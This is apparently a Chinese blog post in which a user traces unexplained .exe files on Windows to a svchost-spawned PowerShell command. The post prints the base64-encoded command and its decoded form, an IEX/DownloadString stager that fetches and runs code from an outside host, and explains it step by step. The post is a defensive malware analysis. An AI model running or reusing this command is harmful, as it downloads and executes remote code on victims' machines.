不知道有没有同感的朋友,c盘根目录或Windows目录下总会莫名其妙生成一些尾巴.exe文件。很是烦人,什么程序生成的呢?为了一探究竟,需要用到的软件:1、MiniFileMon 2、Base64 解码。
首先运行MiniFileMon,发现很多程序都调用svchost进程,所以主要监听svchost.exe。
打开监听,让程序自己跑会儿,这会儿可以刷刷手机撩会儿妹子,…………犀利的眼神突然定格在了这里:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
为什么说定格在这里,因为svchost.exe触发了powershell.EXE程序,他可不像cmd只能简单的处理几条命令。他可是有.NET做强大的后盾。C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE这个大家都明白,调用powershell执行程序。后面-ep bypass –e这些参数网上搜搜也能知道个大概。再往后这一堆乱七八糟的代码没几个能看懂的了,怎么办?
简单,
第一步:打开网页。
第二步:搜Base64在线解码。
第三步:把“SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=” 粘贴到对应的方框内,进行解码。
解码后你会发现,呦西,omg:IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
有什么用呢?一步一步来分析:
IEX他是powershell自带的函数,作用是执行后面的函数或命令,讲到后背是否开始发麻了呢?
再往后看New-Object Net.WebClient!!!!什么?他竟然调用了.net中的函数?没错,刚才讲过powershell的后盾是谁。调用的那种类型呢?downloadstring下载字符串。
这个流程分析完,重新捋一下这个恶意软件思路:
- 调用powershell。
- 下载函数或命令。
- 通过powershell执行。
- 在内存中运行,这种狡猾程度,什么X60、X毒霸……,都是粑粑。
小结:这不就是典型的:永恒之蓝?没错,这是他的变种。不得不说,这些程序员的脑回路,不是一般的强。